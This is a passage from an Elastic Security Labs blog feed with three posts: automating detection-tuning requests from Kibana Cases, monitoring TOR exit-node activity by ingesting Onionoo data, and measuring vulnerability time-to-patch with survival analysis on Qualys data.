          &quot;range&quot;: {  
            &quot;cases.updated_at&quot;: {  
              &quot;format&quot;: &quot;strict_date_optional_time&quot;,  
              &quot;gte&quot;: &quot;now-1h&quot;,  
              &quot;lte&quot;: &quot;now&quot;  
            }  
          }  
        }  
      ],  
      &quot;should&quot;: [],  
      &quot;must_not&quot;: []  
    }  
  },  
 &quot;runtime_mappings&quot;: {  
   &quot;TuningDetail&quot;: {  
     &quot;type&quot;: &quot;keyword&quot;,  
     &quot;script&quot;: {  
       &quot;source&quot;: &quot;if (\nparams._source.containsKey('cases') &amp;&amp;\nparams._source.cases != null &amp;&amp;\nparams._source.cases.containsKey('customFields') &amp;&amp;\nparams._source.cases.customFields != null\n) {\nfor (def cf : params._source.cases.customFields) {\nif (\ncf != null &amp;&amp;\ncf.containsKey('key') &amp;&amp;\ncf.key != null &amp;&amp;\ncf.key.contains('6cadc70a-7d68-4531-9861-7d5bc24c4c1c') &amp;&amp;\ncf.containsKey('value') &amp;&amp;\ncf.value != null\n) {\nemit(cf.value);\nbreak;\n}\n}\n}&quot;  
     }  
   },  
   &quot;TuningRequired&quot;: {  
     &quot;type&quot;: &quot;boolean&quot;,  
     &quot;script&quot;: {  
       &quot;source&quot;: &quot;if (\nparams._source.containsKey('cases') &amp;&amp;\nparams._source.cases != null &amp;&amp;\nparams._source.cases.containsKey('customFields') &amp;&amp;\nparams._source.cases.customFields != null\n) {\nfor (def cf : params._source.cases.customFields) {\nif (\ncf != null &amp;&amp;\ncf.containsKey('key') &amp;&amp;\ncf.key != null &amp;&amp;\ncf.key.contains('496e71f2-2bce-47a2-93a8-00db0de2d1b4') &amp;&amp;\ncf.containsKey('value') &amp;&amp;\ncf.value != null\n) {\nemit(cf.value);\nbreak;\n}\n}\n}&quot;  
     }  
   }  
 },  
  &quot;fields&quot;: [  
    &quot;TuningDetail&quot;,  
    &quot;TuningRequired&quot;  
  ]  
}
</code></pre>
<p>Any time a field is changed or a comment is made in a case it will update the <code>updated_at</code> field to the current time. Because any update or comment added to a case will update this timestamp, it is possible to have a single case returned multiple times by this automation if it is run regularly while the case is being updated. Any automation processes leveraged for this should have a deduplication process to prevent processing the same case multiple times in this scenario.</p>
<h3>Step 2: Parsing each case</h3>
<p>Loop through each of the cases returned by the previous query to process them one at a time. Each document returned will contain the <code>fields</code> array with the values from the custom fields, as well as other useful fields. Parse each of the following fields and store them for future use:</p>
<ul>
<li>The <code>_id</code> field will have a format like <code>cases:{{case_ID}}</code>. The case ID is used for future API requests in the automation to add comments to the case or retrieve all alerts attached to the case.</li>
<li><code>cases.title</code> is the title of the case</li>
<li><code>cases.assignees</code> is who the case is assigned to</li>
<li><code>cases.updated_by</code> is the last person to update the case, this is often the person submitting the tuning request and can be useful for knowing who to contact for more information.</li>
<li><code>cases.tags</code> can be useful if you are using tags to sort or identify your cases.</li>
</ul>
<h3>Step 3: Retrieving the alerts attached to the case</h3>
<p>For each case you will want to know which alerts are attached to the case so you know which alerts need to be tuned. This can be done using the <a href="https://www.elastic.co/kr/docs/api/doc/kibana/operation/operation-getcasealertsdefaultspace">cases API</a> with the <code>_id</code> field for the case.</p>
<p><code>/api/cases/{caseId}/alerts</code></p>
<p>This query will return an array of all alert <code>id</code> values that are attached to the case. Using this ID value you can query the <code>.siem-signals*</code> elasticsearch index to find the full information about each alert attached to the case that needs tuning.</p>
<pre><code class="language-yaml">POST /.siem-signals-*/_search  
{  
 &quot;size&quot;: 1,  
 &quot;query&quot;: {  
   &quot;bool&quot;: {  
     &quot;must&quot;: [],  
     &quot;filter&quot;: [  
       {  
         &quot;bool&quot;: {  
           &quot;should&quot;: [  
             {  
               &quot;match&quot;: {  
                 &quot;_id&quot;: &quot;{{alert_id}}&quot;  
               }  
             }  
           ],  
           &quot;minimum_should_match&quot;: 1  
         }  
       },  
       {  
         &quot;range&quot;: {  
           &quot;@timestamp&quot;: {  
             &quot;format&quot;: &quot;strict_date_optional_time&quot;,  
             &quot;gte&quot;: &quot;now-30d&quot;,  
             &quot;lte&quot;: &quot;now&quot;  
           }  
         }  
       }  
     ],  
     &quot;should&quot;: [],  
     &quot;must_not&quot;: []  
   }  
 }  
}
</code></pre>
<p>From the results of this query you can extract information about the alert such as the name and creation date, along with any other information that could help for tuning such as the <code>user.name</code> or <code>process.name</code> fields. Because a case can have many alerts attached to it you will want to deduplicate the alerts by the <code>signal.rule.name</code> value.</p>
<h3>Step 4: Opening a tuning request.</h3>
<p>This step is dependent on the ticketing system you use in your environment. Our team uses github issues to track tuning requests and slack for notifications, but this could also be done with any ticketing or project management system that supports automation.</p>
<p>This is the logic flow we use for our automation using both Github and Slack to track tuning requests:</p>
<ul>
<li>Using the name of the alert we search for any existing open tuning requests.
<ul>
<li>If an existing tuning request exists we update that request with the details from the case and the new request</li>
<li>If no existing request exists we open a new tuning request issue and attach the information</li>
</ul>
</li>
<li>We then send a slack notification to the Detection engineering team’s slack channel containing a link to the tuning request, a link to the case, and details about the request and alert.</li>
<li>We then use the <a href="https://www.elastic.co/kr/docs/api/doc/kibana/operation/operation-addcasecommentdefaultspace">Cases API</a> to add a comment to the original case with a link to the tuning request issue</li>
<li><strong>Optional AI Agent</strong>: We are starting to experiment with the use of AI Agents to analyze the alert and case information and then provide even better context with the tuning request, potentially even recommending the changes to make to the detection rules.</li>
</ul>
<p>The final result from this automation is that our SOC Analysts can create a detailed detection tuning request ticket with a single click from their case. We have seen a dramatic increase in the reduction of false positives and the overall efficiency of our detection rules because of this automation.</p>
<h2>Conclusion</h2>
<p>By using Kibana Cases with custom fields and integrating with automation platforms, you can optimize many of your manual processes. This automated workflow reduces the manual overhead associated with collecting analyst feedback, ensuring that valuable analyst insights are quickly translated into actionable improvements in detection rules. The result is a more efficient, accurate, and resilient SOC that can adapt rapidly to emerging threats and reduce alert fatigue.</p>
<p>Ready to optimize your SOC's efficiency and improve your detection posture? Explore Elastic Security and start building your own automated tuning request workflows today!</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/automating-detection-tuning-requests-with-kibana-cases/Security Labs Images 10.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[TOR Exit Node Monitoring Overview]]></title>
            <link>https://www.elastic.co/kr/security-labs/tor-exit-node-monitoring</link>
            <guid>tor-exit-node-monitoring</guid>
            <pubDate>Mon, 27 Oct 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Learn how to monitor your enterprise for TOR exit node activity.]]></description>
            <content:encoded><![CDATA[<h2>Why Monitoring for TOR Exit Node Activity Matters</h2>
<p>In today’s complex cybersecurity landscape, one of the most overlooked but critical elements in proactive threat detection is monitoring for TOR (The Onion Router) exit node activity. TOR enables anonymous communication, and while it serves legitimate privacy interests, it also provides cover for cybercriminals, malware campaigns, and data exfiltration.</p>
<h2>What Are TOR Exit Nodes?</h2>
<p>TOR exit nodes are the final relay points in the TOR network where encrypted traffic exits to the open internet. If a user browses the web anonymously via TOR, the website or service they access will see the IP address of the exit node, not the user's actual IP address.</p>
<p>In other words, any network traffic originating from a TOR exit node is untraceable to its source without cooperation from the TOR network, which is unlikely by design.</p>
<h2>Why Should You Care?</h2>
<p>While not all TOR activity is malicious, a substantial amount of malicious traffic uses TOR to mask its origin. Here’s why it matters:</p>
<ol>
<li>
<p><strong>Anonymized Reconnaissance:</strong> Attackers often perform scans and probes from TOR exit nodes. If someone is mapping your infrastructure using TOR, they may be preparing for a breach attempt while remaining anonymous.</p>
</li>
<li>
<p><strong>Command and Control (C2) Channels:</strong> Many malware families use TOR for C2 communications, making it hard to trace the infected endpoint back to its controller.</p>
</li>
<li>
<p><strong>Data Exfiltration:</strong> TOR is a common channel for exfiltrating sensitive data out of an organization. If sensitive files are being uploaded to external endpoints via TOR, you may already be compromised.</p>
</li>
<li>
<p><strong>Compliance Risks:</strong> Some industries (e.g., healthcare, finance) require strict data handling and access controls. Allowing or ignoring TOR-originated traffic could violate these policies or industry regulations.</p>
</li>
</ol>
<p>You should look for any interactions between TOR exit nodes and:</p>
<ul>
<li>host.ip</li>
<li>server.ip</li>
<li>destination.ip</li>
<li>source.ip</li>
<li>client.ip</li>
</ul>
<p>This can occur in logs from firewalls, DNS, proxies, endpoint agents, cloud access logs, and more.</p>
<h2>How to Monitor for TOR Exit Nodes</h2>
<p>In order to collect, monitor, alert, and report on TOR Exit Node activity, we must first create a few components, namely, we will create an index template and an ingest pipeline. We will then hit the TOR API endpoint every 1 hour to request the most recent detailed information.</p>
<p>If you would like to learn more about options for monitoring TOR, you may read about them <a href="https://metrics.torproject.org/onionoo.html">here</a>. If you would like to know more about the TOR Project in general, you may read about it <a href="https://www.torproject.org/">here</a>.</p>
<h3>Ingest Pipeline</h3>
<p>First, let’s create an Ingest Pipeline that will accomplish the last bit of parsing our data before it is written to an index. In DevTools, simply apply the following: there are descriptions for each processor; should you want to know more about what each does and its associated condition, if present.</p>
<p>Here is what your screen may look like:<br />
<img src="https://www.elastic.co/kr/security-labs/assets/images/tor-exit-node-monitoring/image4.png" alt="" /></p>
<p>You may find the ingest pipeline on <a href="https://ela.st/tor-node-ingest-pipeline">GitHub</a>.</p>
<h3>Index Template</h3>
<p>Next, we need to create our index template to ensure our fields are correctly mapped.</p>
<p>Still in DevTools, submit the following request just as you completed with the ingest pipeline.  You may find the index template via <a href="https://ela.st/tor-node-index-template">this link</a> on GitHub.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/tor-exit-node-monitoring/image9.png" alt="" /></p>
<p>Notice the priority of the index template; we set this to a much higher number so that this template will take precedence over the default logs-*-* template. While you will notice in the following steps that we set the ingest pipeline in our configuration for data collection, we may also apply it here as a safeguard to ensure data is written through this pipeline.</p>
<h3>Elastic-Agent Policy</h3>
<p>With these two items loaded, we may now navigate to Fleet and select the “agent policy” we want to install our integration to.</p>
<p>On the policy you wish to install the TOR collection to, simply click “Add integration”.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/tor-exit-node-monitoring/image13.png" alt="" /></p>
<p>Select “Custom” from the left-hand category list, then click “Custom API”.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/tor-exit-node-monitoring/image10.png" alt="" /></p>
<p>Click the blue “Add Custom API” button on your top right.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/tor-exit-node-monitoring/image12.png" alt="" /></p>
<p>You may title your Integration anything you like; however, I will be using “TOR Node Activity” in this example.</p>
<p>Fill in the following fields:</p>
<p>Dataset name:<br />
<code>ti_tor.node_activity</code></p>
<p>Ingest Pipeline:<br />
<code>logs-ti_tor.node_activity</code></p>
<p>Request URL:<br />
<code>https://onionoo.torproject.org/details?fields=exit_addresses,nickname,fingerprint,running,as_name,verified_host_names,unverified_host_names,or_addresses,last_seen,last_changed_address_or_port,first_seen,hibernating,last_restarted,bandwidth_rate,bandwidth_burst,observed_bandwidth,flags,version,version_status,advertised_bandwidth,platform,recommended_version,contact</code></p>
<p>Request Interval:<br />
<code>60m</code></p>
<p>Request HTTP Method:<br />
<code>GET</code></p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/tor-exit-node-monitoring/image2.png" alt="" /></p>
<p>Response Split:<br />
<code>target: body.relays</code></p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/tor-exit-node-monitoring/image6.png" alt="" /></p>
<p>You will then need to click to expand the “&gt; Advanced options” and scroll down a bit more.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/tor-exit-node-monitoring/image3.png" alt="" /></p>
<p>You may find the necessary processor snippet to copy at GitHub <a href="https://ela.st/tor-node-elastic-agent-processors">here</a>.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/tor-exit-node-monitoring/image1.png" alt="" /></p>
<p>You may now click the “Save and continue” button and in a few minutes you will have TOR node activity available in your logs-* index!</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/tor-exit-node-monitoring/image5.png" alt="" /></p>
<h3>Filebeat Installation Option</h3>
<p>If you are not using Elastic-Agent and wish to ingest via Filebeat, that’s cool too! Instead of using the steps above, simply leverage the following “filebeat.inputs:” which will use the exact same ingest pipeline and index template as above!  Simply copy and paste the <a href="https://ela.st/tor-node-filebeat-input">input section</a> into your filebeat.yml file, you will still need to add an output section.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/tor-exit-node-monitoring/image11.png" alt="" /></p>
<h2>Reviewing your data</h2>
<p>Now that you've completed the configuration of the ingest pipeline and the agent integration, you can see the TOR nodes in the Discover view. From here, you can create rules, visualizations, dashboards, etc., to help keep tabs on how TOR is being used on your network.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/tor-exit-node-monitoring/image14.png" alt="" /></p>
<h2>What can you do next?</h2>
<p>The beautiful thing about the naming convention for this index, is that it will automatically function with your Threat Intel IP Address Indicator Match rule available in the Elastic SIEM.</p>
<p>However, you may want to make your own rule using some of the wealth of information that is provided with this integration; particularly depending on the type of node observed environment. Since there was a considerable amount of geo-based data enriched with this index, now would be an excellent time to check out some of the map features within Kibana.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/tor-exit-node-monitoring/image8.png" alt="" /></p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/tor-exit-node-monitoring/Security Labs Images 9.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Time-to-Patch Metrics: A Survival Analysis Approach Using Qualys and Elastic]]></title>
            <link>https://www.elastic.co/kr/security-labs/time-to-patch-metrics</link>
            <guid>time-to-patch-metrics</guid>
            <pubDate>Wed, 22 Oct 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[In this article, we describe how we applied survival analysis to vulnerability management (VM) data from Qualys VMDR, using the Elastic Stack.]]></description>
            <content:encoded><![CDATA[<h1>Time-to-Patch Metrics: A Survival Analysis Approach Using Qualys and Elastic</h1>
<h2>Introduction</h2>
<p>Understanding how quickly vulnerabilities are remediated across different environments and teams is critical to maintaining a strong security posture. In this article, we describe how we applied <strong>survival analysis</strong> to vulnerability management (VM) data from <strong>Qualys VMDR</strong>, using the <strong>Elastic Stack</strong>. This allowed us to not only confirm general assumptions about team velocity (how quickly teams complete work) and remediation capacity (how much fixing they can take on) but also derive measurable insights. Since most of our security data is in the Elastic Stack, this process should be easily reproducible to other security data sources.</p>
<h3>Why We Did It</h3>
<p>Our primary motivation was to <strong>move from general assumptions to data-backed insights</strong> about:</p>
<ul>
<li>How quickly different teams and environments patch vulnerabilities</li>
<li>Whether patching performance meets internal service level objectives (SLOs)</li>
<li>Where bottlenecks or delays commonly occur</li>
<li>What other factors can affect patching performance</li>
</ul>
<h3>Why Survival Analysis? A Better Alternative to Mean Time to Remediate</h3>
<p>Mean Time to Remediate (MTTR) is commonly used to track how quickly vulnerabilities are patched, but both the mean and median suffer from significant limitations (we provide an example later in this article). The mean is highly sensitive to <em>outliers</em>[^1] and assumes the remediation times are evenly balanced around the average remediation time, which is rarely the case in practice. The median is less sensitive to extremes but discards information about the shape of the distribution and says nothing about the long tail of slow-to-patch vulnerabilities. Neither accounts for unresolved cases, i.e. vulnerabilities that remain open beyond the observation window, which are often excluded entirely. In practice, the vulnerabilities that remain open the longest are precisely the ones we should be most concerned about.</p>
<p><strong>Survival analysis</strong> addresses these limitations. Originating in medical and actuarial contexts, it models <strong>time-to-event data</strong> while explicitly incorporating <strong>censored observations</strong>, meaning in our context vulnerabilities that remain open. (For more details on its application to vulnerability management we strongly recommend <a href="https://www.themetricsmanifesto.com">“The Metrics Manifesto”</a>). Instead of collapsing remediation behavior into a single number, survival analysis estimates the probability that a vulnerability remains unpatched over time (e.g. 90% of vulnerabilities are remediated within 30 days). This allows for more meaningful assessments, such as the proportion of vulnerabilities patched within SLO (for example within 30, 90, or 180 days).</p>
<p>Survival analysis provides us with a <strong>survival function</strong> that estimates the probability a vulnerability remains unpatched over time.</p>
<p>:::
This method offers a better view of remediation performance, allowing us to assess not just how long vulnerabilities persist, but also how remediation behavior differs across systems, teams, or severity levels. It’s particularly well-suited to security data, which is often incomplete, skewed, and resistant to assumptions of normality.
:::</p>
<h2>Context</h2>
<p>Although we have applied survival analysis across different environments, teams and organizations, in this blog we focus on the results for the Elastic Cloud production environment.</p>
<h3>Vulnerability age calculation</h3>
<p>There are different methods to calculate vulnerability age.</p>
<p>For our internal metrics like <a href="https://www.elastic.co/kr/blog/how-infosec-uses-elastic-stack-vulnerability-management">vulnerability adherence SLO</a>, we define vulnerability age as the difference between when a vulnerability was last found and when it was first detected (usually a few days after publication). This approach aims to penalize vulnerabilities that are reintroduced from an outdated base image. In the past, our base images were not updated frequently enough for our satisfaction. If a new instance is created, vulnerabilities can have a significant age (e.g., 100 days) from day one of discovery.</p>
<p>For this analysis, we find it more relevant to calculate the age based on the number of days between the last found date and the first found date. In this case, age represents the number of days the system was effectively exposed.</p>
<h3>“Patch everything” strategy</h3>
<p>In our Cloud environment, we maintain a policy to patch everything. This is because we almost exclusively use the same base image across all instances. Since Elastic Cloud operates fully on containers, there are no specific application packages (e.g., Elasticsearch) installed directly on our systems. Our fleet remains homogeneous as a result.</p>
<h2>Data Pipeline</h2>
<p>Ingesting and mapping data into the Elastic Stack can be cumbersome. Luckily, we have <a href="https://www.elastic.co/kr/integrations/data-integrations?solution=all-solutions&amp;category=security">many security integrations</a> that handle those natively, <a href="https://www.elastic.co/kr/docs/reference/integrations/qualys_vmdr">Qualys VMDR</a> being one of them.</p>
<p>This integration has 3 main interests over custom ingestion methods (e.g. scripts, beats, …):</p>
<ul>
<li>It natively enriches vulnerability data from the Qualys Knowledge Base which add CVE IDs, threat intel information, … <strong>without needing to configure enrich pipelines</strong>.</li>
<li>Qualys data is already mapped to the Elastic Common Schema which is a standardized way of representing data, whether it’s coming from one source or another: for example, CVEs are always stored in field <a href="http://vulnerability.id"><em>vulnerability.id</em></a>, independent of the source.</li>
<li>A transform with the latest vulnerability is already set up. This index can be queried to get the latest vulnerabilities status.</li>
</ul>
<h3>Qualys agent integration configuration</h3>
<p>For survival analysis, we need to ingest both active and patched vulnerabilities. To analyze a specific period, we need to set the number of days in field <code>max_days_since_detection_updated</code>. In our environment, we ingest Qualys data daily, so there’s no need to ingest a long history of fixed data, as we’ve already done that.</p>
<p>The Qualys VMDR elastic agent integration has been configured with the following:</p>
<table>
<thead>
<tr>
<th align="left">Property</th>
<th align="left">Value</th>
<th align="left">Comment</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">(Settings section) Username</td>
<td align="left"></td>
<td align="left"></td>
</tr>
<tr>
<td align="left">(Settings section) Password</td>
<td align="left"></td>
<td align="left">Since there are no API keys available in Qualys, we can only authenticate with Basic Authentication.  Make sure SSO is disabled on this account</td>
</tr>
<tr>
<td align="left">URL</td>
<td align="left"><a href="https://qualysapi.qg2.apps.qualys.com">https://qualysapi.qg2.apps.qualys.com</a> (for US2)</td>
<td align="left"><a href="https://www.qualys.com/platform-identification/">https://www.qualys.com/platform-identification/</a></td>
</tr>
<tr>
<td align="left">Interval</td>
<td align="left">4h</td>
<td align="left">Adjust it based on the number of ingested events.</td>
</tr>
<tr>
<td align="left">Input parameters</td>
<td align="left">show_asset_id=1&amp; include_vuln_type=confirmed&amp;show_results=1&amp;max_days_since_detection_updated=3&amp;status=New,Active,Re-Opened,Fixed&amp;filter_superseded_qids=1&amp;use_tags=1&amp;tag_set_by=name&amp;tag_include_selector=all&amp;tag_exclude_selector=any&amp;tag_set_include=status:running&amp;tag_set_exclude=status:terminated,status:stopped,status:stale&amp;show_tags=1&amp;show_cloud_tags=1</td>
<td align="left">show_asset_id=1: retrieve asset id show_results=1: details about what is the current installed package and which version should be installed max_days_since_detection_updated=3: filter out any vulnerabilities that haven’t been updated over the last 3 days (e.g. patched older than 3 days) status=New,Active,Re-Opened,Fixed: all vulnerability status are ingested filter_superseded_qids=1: ignore superseded ‘vulnerabilities Tags: filter by tags show_tags=1: retrieve Qualys tags show_cloud_tags=1: retrieve Cloud tags</td>
</tr>
</tbody>
</table>
<p>Once data is fully ingested, it can be reviewed either in Kibana Discover (logs-* data view -&gt; <em>data_stream.dataset : &quot;qualys_vmdr.asset_host_detection&quot;</em> ), either in the Kibana Security App (Findings -&gt; Vulnerabilities).</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/time-to-patch-metrics/image6.png" alt="" /></p>
<h3>Loading data into Python with the elasticsearch client</h3>
<p>Since the survival analysis calculation will be done in Python, we need to extract data from elastic into a python dataframe. There are several ways to achieve this, and in this article we’ll focus on two of them.</p>
<h4>With ES|QL</h4>
<p>The easiest and most convenient way is to leverage ES|QL with the arrow format. It’ll automatically populate the python dataframe (rows and columns). We recommend reading the blog post <a href="https://www.elastic.co/kr/search-labs/blog/esql-pandas-native-dataframes-python">From ES|QL to native Pandas dataframes in Python</a> to get more details.</p>
<pre><code class="language-py">from elasticsearch import Elasticsearch
import pandas as pd

client = Elasticsearch(
    &quot;https://[host].elastic-cloud.com&quot;,
    api_key=&quot;...&quot;,
)

response = client.esql.query(
    query=&quot;&quot;&quot;
   FROM logs-qualys_vmdr.asset_host_detection-default
    | WHERE elastic.owner.team == &quot;platform-security&quot; AND elastic.environment == &quot;production&quot;
    | WHERE qualys_vmdr.asset_host_detection.vulnerability.is_ignored == FALSE
    | EVAL vulnerability_age = DATE_DIFF(&quot;day&quot;, qualys_vmdr.asset_host_detection.vulnerability.first_found_datetime, qualys_vmdr.asset_host_detection.vulnerability.last_found_datetime)
    | STATS 
        mean=AVG(vulnerability_age), 
        median=MEDIAN(vulnerability_age)
    &quot;&quot;&quot;,
    format=&quot;arrow&quot;,
)
df = response.to_pandas(types_mapper=pd.ArrowDtype)
print(df)
</code></pre>
<p>Today, we have a limitation with ESQL: we can’t paginate through results. Therefore we are limited to 10K output documents (100K if server configuration is modified). Progress can be followed through this <a href="https://github.com/elastic/elasticsearch/issues/100000">enhancement request</a>.</p>
<h4>With DSL</h4>
<p>In the elasticsearch python client, there is a native feature to extract all the data from a query with transparent pagination. The challenging part is to create the DSL query. We recommend creating the query in Discover and then click on Inspect, and then Request tab to get the DSL query.</p>
<pre><code class="language-py">query = {
    &quot;track_total_hits&quot;: True,
    &quot;query&quot;: {
        &quot;bool&quot;: {
            &quot;filter&quot;: [
                {
                    &quot;match&quot;: {
                        &quot;elastic.owner.team&quot;: &quot;awesome-sre-team&quot;
                    }
                },
                {
                    &quot;match&quot;: {
                        &quot;elastic.environment&quot;: &quot;production&quot;
                    }
                },
                {
                    &quot;match&quot;: {
&quot;qualys_vmdr.asset_host_detection.vulnerability.is_ignored&quot;: False
                    }
                }
            ]
        }
    },
    &quot;fields&quot;: [
        &quot;@timestamp&quot;,
        &quot;qualys_vmdr.asset_host_detection.vulnerability.unique_vuln_id&quot;,
        &quot;qualys_vmdr.asset_host_detection.vulnerability.first_found_datetime&quot;,
        &quot;qualys_vmdr.asset_host_detection.vulnerability.last_found_datetime&quot;,
        &quot;elastic.vulnerability.age&quot;,
        &quot;qualys_vmdr.asset_host_detection.vulnerability.status&quot;,
        &quot;vulnerability.severity&quot;,
        &quot;qualys_vmdr.asset_host_detection.vulnerability.is_ignored&quot;
    ],
    &quot;_source&quot;: False
}

results = list(scan(
        client=es,
        query=query,
        scroll='30m',
        index=source_index,
        size=10000,
        raise_on_error=True,
        preserve_order=False,
        clear_scroll=True
    ))
</code></pre>
<h2>Survival Analysis</h2>
<p>You can refer to the <a href="https://github.com/lauravoicu/elastic-vm-survivalanalysis/tree/main">code</a> to understand or reproduce it on your dataset.</p>
<h2>What We Learned</h2>
<p>Leaning in on the research from the <a href="https://www.cyentia.com/why-your-mttr-is-probably-bogus/">Cyentia Institute</a> we looked at a few different ways to measure how long it takes to remediate vulnerabilities using means, medians, and survival curves. Each method gives a different lens through which we can understand time-to-patch data, and the comparison is important because depending on which method we use, we would draw very different conclusions about how well vulnerabilities are being addressed.</p>
<p>The first method focuses only on vulnerabilities that have already been closed. It calculates the median and mean time it took to patch them. This is intuitive and simple, but it leaves out a potentially large and important portion of the data (the vulnerabilities that are still open). As a result, it tends to underestimate the true time it takes to remediate, especially if some vulnerabilities stay open much longer than others.</p>
<p>The second method tries to include both closed and open vulnerabilities by using the time they’ve been open <em>so far</em>. There are many options to approximate a time-to-patch for the open vulnerabilities, but for simplicity here we assumed they were (will be?) patched at the time of reporting, which we know isn’t true. But it does offer a way to factor in their existence.</p>
<p>The third method uses survival analysis. Specifically, we used the Kaplan-Meier estimator to model the likelihood that a vulnerability is still open at any given time. This method handles the open vulnerabilities properly: instead of pretending they’re patched, it treats them as “censored” data. The survival curve it produces drops over time, showing the proportion of vulnerabilities still open as days or weeks pass.</p>
<h3>How Long Do Vulnerabilities Last?</h3>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/time-to-patch-metrics/image4.png" alt="" /></p>
<p>In the current 6-month snapshot[^2], the closed-only time-to-patch has a median ~33 days and a mean ~35 days. On the surface that looks reasonable, but the Kaplan-Meier curve shows what those numbers hide: at 33 days, ~54% are still open; at 35 days, ~46% are still open. So even around the “typical” one-month mark, about half of issues remain unresolved.</p>
<p>We also computed observed-so-far statistics (treating open vulnerabilities as if they were patched at the end of the measurement window). In this window they happen to be almost the same (median ~33 days, mean ~35 days) because the ages of today’s open items cluster near one month. That coincidence can make averages look reassuring, but it’s incidental and unstable: if we shift the snapshot to just before the monthly patch push and these same statistics drop sharply (we’ve seen an observed median of ~19 days and observed a mean of ~15 days) without any change in the underlying process.</p>
<p>The survival curve avoids that trap, because it answers the question of “% still open after 30/60/90 days”, and offers visibility into the long tail that stays open well past a month.</p>
<h3>Patch Everything Everywhere The Same Way?</h3>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/time-to-patch-metrics/image5.png" alt="" /></p>
<p>Stratified survival analysis takes the idea of survival curves one step further. Instead of looking at all vulnerabilities together in one big pool, it separates them into groups (or “strata”) based on some meaningful characteristic. In our analysis, we have stratified vulnerabilities by severity, asset criticality, environment, cloud provider, team/division/organization. Each group gets its own survival curve, and here in the example graph we compare how quickly different vulnerability severities are remediated over time.</p>
<p>The benefit of this approach is that it exposes differences that would otherwise be hidden in the aggregate. If we only looked at the overall survival curve, we can only make conclusions about the remediation performance across the board. But stratification reveals if different teams, environments or severity issues are addressed faster than the rest, and in our case that the patch everything strategy is indeed consistent. This level of detail is important for making targeted improvements, helping us understand not just how long remediation takes in general, but if and where real bottlenecks exist.</p>
<h3>How Fast Do Teams Act?</h3>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/time-to-patch-metrics/image2.png" alt="" /></p>
<p>While the survival curve emphasizes how long vulnerabilities remain open, we can flip the perspective by using the cumulative distribution function (CDF) instead. The CDF focuses on how quickly vulnerabilities are patched, showing the proportion of vulnerabilities that have been remediated by a given point in time.</p>
<p>Our choice of plotting the CDF provides a clear picture of remediation speed, however it’s important to note that this version includes only vulnerabilities that were patched within the observed time window. Unlike the survival curve which we compute over a rolling 6-month cohort to capture full lifecycles, the CDF is computed month-over-month on items closed in that month[^3].</p>
<p>As such, it tells us how quickly teams remediate vulnerabilities <strong>once they do so</strong>, and it doesn’t reflect how long unresolved vulnerabilities remain open. For example, we see that 83.2% of the vulnerabilities closed in the current month were resolved within 30 days of the first detection. This highlights patching velocity for recent, successful patches but does not account for longer-standing vulnerabilities that remain open and are likely to have longer time-to-patch durations. Therefore, we use the CDF for understanding short-term response behavior, whereas the full lifecycle dynamics are given by a combination of CDF alongside survival analysis: the CDF describes <em>how fast teams act</em> once they patch, whereas the survival curve shows <em>how long vulnerabilities truly last</em>.</p>
<h2>Difference Between Survival Analysis and Mean/Median</h2>
<p>Wait, we said that survival analysis is better to analyze time to patch to avoid the impact of outliers. But in this example, mean/median and survival analysis provide similar results. What is the added value? The reason is simple: we don’t have outliers in our production environments since our patching process is fully automated and effective.</p>
<p>To demonstrate the impact on heterogeneous data, we’ll use an outdated example from a non-production environment that lacks automated patching.</p>
<p>ESQL query:</p>
<pre><code class="language-sql">FROM qualys_vmdr.vulnerability_6months
  | WHERE elastic.environment == &quot;my-outdated-non-production-environment&quot;
  | WHERE qualys_vmdr.asset_host_detection.vulnerability.is_ignored == FALSE
  | EVAL vulnerability_age = DATE_DIFF(&quot;day&quot;, qualys_vmdr.asset_host_detection.vulnerability.first_found_datetime, qualys_vmdr.asset_host_detection.vulnerability.last_found_datetime)
  | STATS
      count=COUNT(*),
      count_closed_only=COUNT(*) WHERE qualys_vmdr.asset_host_detection.vulnerability.status == &quot;Fixed&quot;,
      mean_observed_so_far=MEDIAN(vulnerability_age),
      mean_closed_only=MEDIAN(vulnerability_age) WHERE qualys_vmdr.asset_host_detection.vulnerability.status == &quot;Fixed&quot;,
      median_observed_so_far=MEDIAN(vulnerability_age),
      median_closed_only=MEDIAN(vulnerability_age) WHERE qualys_vmdr.asset_host_detection.vulnerability.status == &quot;Fixed&quot;
</code></pre>
<table>
<thead>
<tr>
<th align="left"></th>
<th align="left">Observed so far</th>
<th align="left">Closed only</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Count</td>
<td align="left">833</td>
<td align="left">322</td>
</tr>
<tr>
<td align="left">Mean</td>
<td align="left">178.7 (days)</td>
<td align="left">163.8 (days)</td>
</tr>
<tr>
<td align="left">Median</td>
<td align="left">61 (days)</td>
<td align="left">5 (days)</td>
</tr>
<tr>
<td align="left">Median survival</td>
<td align="left">527 (days)</td>
<td align="left">N/A</td>
</tr>
</tbody>
</table>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/time-to-patch-metrics/image1.png" alt="" /></p>
<p>In this example, using mean and median yield very different results. Choosing a single representative metric can be challenging and potentially misleading. The survival analysis graph accurately represents our effectiveness in addressing vulnerabilities within this environment.</p>
